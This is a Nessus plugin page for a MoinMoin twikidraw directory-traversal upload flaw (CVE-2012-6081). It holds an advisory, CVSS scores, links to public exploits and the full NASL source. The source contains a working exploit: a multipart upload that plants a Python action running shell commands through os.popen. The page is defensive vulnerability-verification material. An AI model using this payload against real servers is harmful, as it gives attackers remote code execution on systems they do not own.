MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite - Nessus

High   Plugin ID: 63638

This page contains detailed information about the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite Nessus plugin, including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying this vulnerability.

Plugin Overview


ID: 63638
Name: MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite
Filename: moinmoin_twikidraw_code_exec.nasl
Vulnerability Published: 2012-12-29
This Plugin Published: 2013-01-21
Last Modification Time: 2022-04-11
Plugin Version: 1.20
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: moinmoin_detect.nasl
Required KB Items: www/moinmoin
Excluded KB Items: Settings/disable_cgi_scanning

Vulnerability Information


Severity: High
Vulnerability Published: 2012-12-29
Patch Published: 2012-12-29
CVE: CVE-2012-6081, CVE-2012-6495
CPE: cpe:/a:moinmo:moinmoin

Synopsis

A wiki application on the remote web server is affected by a code execution vulnerability.

Description

The MoinMoin install hosted on the remote web server fails to properly sanitize user-supplied input in the twikidraw (action/twikidraw.py) action. A remote, unauthenticated attacker could utilize a specially crafted request using directory traversal style characters to upload a file containing arbitrary code to the remote host. An attacker could then execute the code with the privileges of the user that runs the MoinMoin process. Successful exploitation requires that the MoinMoin plugin directory has write permission set for the MoinMoin server user.

Note that the 'anywikidraw' action is reportedly also affected by the directory traversal and code execution vulnerabilities. The application is also reportedly affected by an additional directory traversal vulnerability in the action/AttachFile.py script (CVE-2012-6080) as well as a cross-site scripting (XSS) vulnerability when creating an rss link (CVE-2012-6082). Nessus has not, however, tested for these additional issues.

Solution

Upgrade to version 1.9.6 or later.

Public Exploits


Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, Immunity Canvas, D2 Elliot)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite vulnerability:

  1. Metasploit: exploit/unix/webapp/moinmoin_twikidraw
    [MoinMoin twikidraw Action Traversal File Upload]
  2. Exploit-DB: exploits/linux/remote/26422.rb
    [EDB-26422: MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)]
  3. Exploit-DB: exploits/php/webapps/25304.py
    [EDB-25304: MoinMoin - Arbitrary Command Execution]
  4. D2 Elliot: moinmoin_1.9.5_rce.html
    [MoinMoin 1.9.5 RCE]
  5. Immunity Canvas: CANVAS

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS Score Source: CVE-2012-6495
CVSS V2 Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score: 6.0 (Medium)
Impact Subscore: 6.4
Exploitability Subscore: 6.8
CVSS Temporal Score: 5.0 (Medium)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 5.0 (Medium)
CVSS V3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C
CVSS Base Score: 8.8 (High)
Impact Subscore: 5.9
Exploitability Subscore: 2.8
CVSS Temporal Score: 8.2 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 8.2 (High)


Plugin Source


This is the moinmoin_twikidraw_code_exec.nasl nessus plugin source code. This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(63638);
  script_version("1.20");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-6081", "CVE-2012-6495");
  script_bugtraq_id(57082, 57147);
  script_xref(name:"EDB-ID", value:"25304");

  script_name(english:"MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite");

  script_set_attribute(attribute:"synopsis", value:
"A wiki application on the remote web server is affected by a code
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The MoinMoin install hosted on the remote web server fails to properly
sanitize user-supplied input in the twikidraw (action/twikidraw.py)
action.  A remote, unauthenticated attacker could utilize a specially
crafted request using directory traversal style characters to upload a
file containing arbitrary code to the remote host.  An attacker could
then execute the code with the privileges of the user that runs the
MoinMoin process.  Successful exploitation requires that the MoinMoin
plugin directory has write permission set for the MoinMoin server user. 

Note that the 'anywikidraw' action is reportedly also affected by the
directory traversal and code execution vulnerabilities.  The application
is also reportedly affected by an additional directory traversal
vulnerability in the action/AttachFile.py script (CVE-2012-6080) as well
as a cross-site scripting (XSS) vulnerability when creating an rss link
(CVE-2012-6082).  Nessus has not, however, tested for these additional
issues.");
  script_set_attribute(attribute:"see_also", value:"http://moinmo.in/SecurityFixes");
  script_set_attribute(attribute:"see_also", value:"http://moinmo.in/SecurityFixes/CVE-2012-6081");
  # http://www.h-online.com/security/news/item/Hackers-gain-access-to-all-edu-domains-1858471.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1f8ddc57");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.9.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-6495");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"MoinMoin 1.9.5 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'MoinMoin twikidraw Action Traversal File Upload');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:"CANVAS");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/12/29");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/12/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/01/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:moinmo:moinmoin");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("moinmoin_detect.nasl");
  script_require_keys("www/moinmoin");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:80);

install = get_install_from_kb(
  appname:"moinmoin",
  port:port,
  exit_on_fail:TRUE
);

dir = install["dir"];
install_url = build_url(qs:dir, port:port);

# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';
  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";


# Check permissions on WikiSandBox page
res = http_send_recv3(
  method       : "GET",
  item         : dir + "/WikiSandBox",
  port         : port,
  exit_on_fail : TRUE
);

if ("Edit (Text)" >!< res[2] || "Edit (GUI)" >!< res[2])
  exit(0, "Authentication is required to test the MoinMoin install at " + install_url + ".");

# Grab a ticket hash needed for the exploit
url = "/WikiSandBox?action=twikidraw&do=modify&target=../../../../data/plugin/action/nessus.py";

res = http_send_recv3(
  method       : "GET",
  item         : dir + url,
  port         : port,
  exit_on_fail : TRUE
);

# Versions 1.9.x < 1.9.2 do not use a ticket hash
# Versions 1.9.2 and up do require this value
pat = "&amp;ticket=(.+)&amp;";
match = eregmatch(pattern:pat, string:res[2]);
if (!isnull(match)) ticket = match[1];
else ticket = "";

# Check for escaping in versions >= 1.9.6 which indicate a non-affected instance
pat2 = 'param name="basename" value="(.._)+';
match2 = eregmatch(pattern:pat2, string:res[2]);
if (!isnull(match2))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "MoinMoin", install_url);

# variables for our loop
vuln = FALSE;
vuln2 = FALSE;

foreach cmd (cmds)
{
  script = (SCRIPT_NAME - ".nasl");
  script =  str_replace(string:script, find:"_", replace:"");
  exp_script = script + unixtime() + ".py";

  # Define our exploits
  # Unix exploit
  unix_exploit = '--89692781418184\nContent-Disposition: form-data;' +
    ' name="filename"\n\ndrawing.r if()else[]\nimport os\ndef execute(p,r):' +
    'exec"print>>r,os\\56popen(' + "'" + cmd + "&&pwd'" + ")\56read()" +
    '"\n--89692781418184\nContent-Disposition: form-data; name="filepath"; ' +
    'filename="drawing.png"\nContent-Type: image/png\n\nMoinMoin error' +
    '\n\n--89692781418184--';

  # Windows exploit
  win_exploit = '--89692781418184\nContent-Disposition: form-data; ' +
    'name="filename"\n\n"\n--89692781418184\nContent-Disposition: form-data;' +
    ' name="filepath"; filename="drawing.png"\nContent-Type: image/png\n\n' +
    'MoinMoin error\ndrawing.r if()else[]\nimport os\ndef execute(p,r):exec"' +
    'print>>r,os\\56popen(' + "'" + cmd + "&& dir'" + ")\56read()" +
    '"\n\n--89692781418184--';

  if (cmd == 'id') exploit = unix_exploit;
  else exploit = win_exploit;

  # Upload our file
  url = "?action=twikidraw&do=save&ticket=" + ticket +
    "&target=../../../../data/plugin/action/" + exp_script;

  res = http_send_recv3(
    method       : "POST",
    item         : dir + "/WikiSandBox" + url,
    add_headers  : make_array("Content-Type",
                   "multipart/form-data; boundary=89692781418184"),
    data         : exploit,
    port         : port,
    exit_on_fail : TRUE
  );
  exp_request = http_last_sent_request();
  upload = res[2];

  # Test code execution with our uploaded file
  check_url = "/WikiSandBox?action=" + (exp_script - ".py");
  res = http_send_recv3(
    method       : "GET",
    item         : dir + check_url,
    port         : port,
    exit_on_fail : TRUE
  );

  # Extract path for reporting. /data/plugin/action is where upload will reside
  if (cmd == 'id')
  {
    get_path = strstr(res[2], "/");
    get_up_path = chomp(get_path) + "/data/plugin/action/" + script + "*";

    output = strstr(res[2], "uid") - get_path;
  }
  else
  {
    get_path = strstr(res[2], "Volume in drive");
    get_dir = egrep(pattern:"Directory of (.+)", string:get_path);
    get_up_path = chomp((get_dir - " Directory of ")) + "\data\plugin\action\"+
       script + "*";

    output = strstr(res[2], "Windows IP") - get_path;
  }

  match = egrep(pattern:cmd_pats[cmd], string:res[2]);


  # For CGI installs, plugins are activated on the next request
  if (match)
  {
    vuln = TRUE;
    break;
  }
  # For the standalone or twisted servers, plugins are activated after
  # restarting the MoinMoin server.
  # For FastCGI and mod_python, Apache needs a restart for exploit to work.
  else if (
   (isnull(upload)) &&
   (!vuln) &&
   ("<h1>Unhandled Exception</h1>" >!< res[2])
  )
  {
    vuln2 = TRUE;
    break;
  }
}

# Exit if upload and/or attack fail
if ((!vuln) && (!vuln2))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "MoinMoin", install_url);

# Reporting
if (report_verbosity > 0)
{
  snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);

  # Reporting for successful exploit
  if (vuln)
  {
    report =
      '\nNessus was able to verify the issue exists using the following request :' +
       '\n' +
       '\n' + install_url + check_url +
       '\n' +
       '\nNote: This file has not been removed by Nessus and will need to be' +
       '\nmanually deleted (' + get_up_path + ').' +
       '\n';
    if (report_verbosity > 1)
    {
      report +=
        '\nThis file was uploaded using the following request :' +
        '\n' +
        '\n' + snip +
        '\n' + exp_request +
        '\n' + snip +
        '\n' +
        '\n' + 'The file uploaded by Nessus executed the command "'+cmd+ '"' +
        '\nwhich produced the following output :' +
        '\n' +
        '\n' + snip +
        '\n' + chomp(output) +
        '\n' + snip +
        '\n';
    }
  }
  # Reporting for successful upload, but attack would require a server restart
  # in order for plugin to be activated
  else if (vuln2)
  {
    report =
      '\nNessus was able to upload a file to the remote host, however cannot' +
      '\nverify the issue exists until the web server has been restarted.' +
      '\nTo test the issue after restarting your webserver, you can use the' +
      '\nfollowing URL to verify the exploit :' +
      '\n' +
      '\n' + install_url + check_url +
      '\n' +
      '\nNote that this file has not been removed by Nessus and will need to' +
      '\nbe manually deleted (/data/plugin/action/' + script + '*).' +
      '\n';
    if (report_verbosity > 1)
    {
      report +=
        '\nThis file was uploaded using the following request :' +
        '\n' +
        '\n' + snip +
        '\n' + data_protection::sanitize_uid(output:exp_request) +
        '\n' + snip +
        '\n';
    }
  }
  security_warning(port:port, extra:report);
}
else security_warning(port);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/moinmoin_twikidraw_code_exec.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\moinmoin_twikidraw_code_exec.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/moinmoin_twikidraw_code_exec.nasl


How to Run


Here is how to run the MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite plugin on its own via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select MoinMoin twikidraw.py Traversal File Upload Arbitrary File Overwrite plugin ID 63638.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins against the same target):

/opt/nessus/bin/nasl -K /tmp/state moinmoin_twikidraw_code_exec.nasl -t <IP/HOST>


References


Similar and related Nessus plugins:
  • 63356 - Debian DSA-2593-1 : moin - several vulnerabilities
  • 63636 - Fedora 18 : moin-1.9.6-1.fc18 (2013-0600)
  • 63655 - Fedora 16 : moin-1.9.6-1.fc16 (2013-0640)
  • 63656 - Fedora 17 : moin-1.9.6-1.fc17 (2013-0685)
  • 63397 - FreeBSD : moinmoin -- Multiple vulnerabilities (a264b1b0-5726-11e2-9483-14dae938ec40)
  • 70110 - GLSA-201309-14 : MoinMoin: Multiple vulnerabilities
  • 64930 - MoinMoin < 1.9.6 Multiple Vulnerabilities
  • 30055 - MoinMoin MOIN_ID Cookie userform Action Traversal Arbitrary File Overwrite
  • 145193 - FreeBSD : moinmoin -- multiple vulnerabilities (abed4ff0-7da1-4236-880d-de33e4895315)
  • 143145 - openSUSE Security Update : moinmoin-wiki (openSUSE-2020-1966)
  • 142736 - Ubuntu 16.04 LTS / 18.04 LTS : MoinMoin vulnerabilities (USN-4629-1)

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file moinmoin_twikidraw_code_exec.nasl version 1.20. For more plugins, visit the Nessus Plugin Library.
